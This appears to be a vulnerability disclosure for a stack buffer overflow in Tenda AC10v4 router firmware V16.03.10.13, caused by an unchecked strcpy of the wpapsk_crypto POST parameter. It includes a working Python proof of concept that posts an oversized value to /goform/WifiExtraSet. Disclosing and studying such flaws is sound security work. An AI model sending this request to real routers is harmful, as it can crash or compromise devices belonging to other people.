Overview

Affected version

AC10v4 V16.03.10.13

Vulnerability details

In the Tenda AC10v4 V16.03.10.13 has a stack overflow vulnerability located in the FUN_0046AC38 function. This function accepts the wpapsk_crypto parameter from a POST request by variable wpapsk_crypto.

image.png

However, since the user has control over the input of wpapsk_crypto, the statement strcpy((char *)&local_1c,__s1); leads to a buffer overflow. The user-supplied wpapsk_crypto can exceed the capacity of the _s1 array, thus triggering this security vulnerability.

image.png

PoC

import requests

url = "<http://192.168.1.100/goform/WifiExtraSet>"

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    # Add other headers if needed, such as User-Agent, etc.
}

data = {
    "wifi_chkHz": "0",
    "wl_mode": "a24l",
    "mac": "111",  # Adjust the value as per your actual requirement
    "handset": "0",
    "wpapsk_crypto": "s"*600,  # Verify if this is correct as per your needs
    "wpapsk_key": "bXF"  # Adjust the value as per your actual requirement
}

response = requests.post(url, headers=headers, data=data)

print(response.status_code)
print(response.text)

image.png